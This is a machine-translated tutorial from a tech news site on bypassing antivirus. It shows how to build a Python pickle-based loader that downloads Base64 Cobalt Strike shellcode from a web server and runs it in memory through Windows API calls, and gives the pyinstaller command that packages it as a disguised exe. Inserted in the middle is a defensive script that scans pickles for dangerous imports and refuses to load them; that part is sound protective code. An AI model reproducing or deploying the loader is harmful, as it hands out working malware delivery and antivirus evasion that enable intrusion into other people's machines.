2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Shulou(Shulou.com)06/01 Report--
What tricks are there for bypassing AV? Many newcomers are not clear on this, so to help with that question the editor below walks through one approach in detail; anyone who needs it can come and learn, and I hope you gain something from it.
01 start
First, use Cobalt Strike to generate a payload in Python script format.
Then copy the payload out of that script and Base64-encode it.
The second step is to host the newly generated Base64 text on a web server so it can be fetched.
If you can see this, that's right.
The next step is to copy that address into the deserialization script (important!).
```python
import base64, pickle

shellcode = """
import ctypes, urllib.request, codecs, base64

shellcode = urllib.request.urlopen('http://172.20.10.2:8080/1111.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode = codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# set VirtualAlloc return type to ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# request memory
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
# put in shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
# create a thread that starts executing at the first address of where the shellcode was placed
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
# wait for the thread created above to finish running
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
"""

class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))

ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
# ret_decode = base64.b64decode(ret_base64)
```
Just put the address in the red box and run it.
After running, we get the following deserialization payload.
Copy this output into the following script to generate the loader.
```python
import base64, pickle, ctypes, urllib.request

# the Base64 blob is truncated on the page
shellcode = b'gANjYnVpbHRpbnMKZXhlYwpxAFg1BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzE3Mi4yMC xMC ...'
pickle.loads(base64.b64decode(shellcode))
```
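The loader above works only because `pickle.loads` will happily import `builtins.exec` when a stream's `__reduce__` asks for it. As an added example (editor's code, not part of the original post or Cobalt Strike), the script below shows the two checks a defender puts in front of any deserialization of untrusted data: a triage scanner that walks the opcode stream with `pickletools` and lists the globals the pickle would import without executing anything, and an allowlisting `Unpickler` whose `find_class` refuses anything outside a known-good set. `DANGEROUS_GLOBALS`, the allowlist, and the constructed demo payload (whose `__reduce__` hands back `exec` with a harmless `pass` statement, the same shape as the article's `class A`) are the editor's assumptions.

```python
"""Defensive counterpart to the pickle loader in the article: inspect which globals a
pickle would import, and only ever load pickles through an allowlist.
Added example by the editor; not code from the original post."""
import base64
import io
import pickle
import pickletools

# Constructed triage denylist: callables that have no business in serialized data.
DANGEROUS_GLOBALS = {
    ("builtins", "exec"), ("builtins", "eval"), ("builtins", "compile"),
    ("builtins", "__import__"), ("os", "system"), ("os", "popen"),
    ("subprocess", "Popen"), ("subprocess", "call"), ("subprocess", "check_output"),
}

# Opcodes that push a str onto the unpickler stack (all protocols).
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}


def referenced_globals(data: bytes) -> list:
    """List the (module, name) pairs a pickle asks the unpickler to import, by walking
    its opcodes with pickletools.genops; nothing in the stream is executed.
    GLOBAL (protocol <= 3) carries "module name" as its argument; STACK_GLOBAL
    (protocol 4+) takes the module and name from the two preceding string pushes,
    which may arrive via the memo (BINGET) when the pickler has seen them before."""
    refs = []
    recent = []        # last two string values pushed, in order
    memo = {}          # memo slot -> string, mirroring the pickler's memo table
    last_pushed = None
    for op, arg, _pos in pickletools.genops(data):
        pushed = None
        if op.name == "GLOBAL":
            module, _, name = arg.partition(" ")
            refs.append((module, name))
        elif op.name == "STACK_GLOBAL":
            refs.append(tuple(recent) if len(recent) == 2 else (None, None))
        elif op.name in STRING_OPS:
            pushed = arg
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            pushed = memo.get(arg)
        elif op.name == "MEMOIZE":          # memoizes top of stack; pushes nothing
            memo[len(memo)] = last_pushed
            continue
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last_pushed
            continue
        last_pushed = pushed
        if pushed is not None:
            recent = (recent + [pushed])[-2:]
    return refs


def flagged_globals(data: bytes) -> list:
    """Subset of referenced_globals that hits the denylist: a triage signal, not a gate."""
    return [ref for ref in referenced_globals(data) if ref in DANGEROUS_GLOBALS]


def flagged_globals_b64(blob: str) -> list:
    """The article's loader ships the pickle Base64-encoded; decode, then scan."""
    return flagged_globals(base64.b64decode(blob))


class RestrictedUnpickler(pickle.Unpickler):
    """Enforcing control: find_class runs before REDUCE, so a forbidden global is
    refused before any callable from the stream is invoked."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("refusing to import %s.%s from pickle data" % (module, name))


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def rejects(data: bytes) -> bool:
    """True when the allowlisting unpickler refuses the stream."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class _ExecOnLoad:
    """Constructed stand-in for the article's class A; the statement is a harmless 'pass'."""
    def __reduce__(self):
        return (exec, ("pass",))


def demo_payload() -> bytes:
    return pickle.dumps(_ExecOnLoad())


def demo_payload_b64() -> str:
    return base64.b64encode(demo_payload()).decode()


def benign_payload() -> bytes:
    # Constructed plain-data pickle: no globals in any protocol.
    return pickle.dumps({"host": "example", "ports": [22, 443], "tags": ("a", None, True)})


if __name__ == "__main__":
    print("benign  :", flagged_globals(benign_payload()), "->", safe_loads(benign_payload()))
    print("loader  :", flagged_globals(demo_payload()), "-> rejected:", rejects(demo_payload()))
```

The scanner resolves the module and name the way the pickler emits them, so it handles both the older `GLOBAL` form and the protocol 4 `STACK_GLOBAL` form with memo lookups; a hand-crafted stream can still confuse it, which is why the allowlisting `find_class` is the control that actually blocks, and the scan is only for triaging blobs found on disk or in transit.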
Then click run, and you will find that a machine has successfully checked in to CS.
Finally, use pyinstaller to package the script into an exe.
Command: pyinstaller -F 2.py --noconsole -i Ladon.ico --key 121212
The generated exe is in the dist directory.
Finally, we test whether it runs.
Successfully launched
02 end
Several screenshots are attached.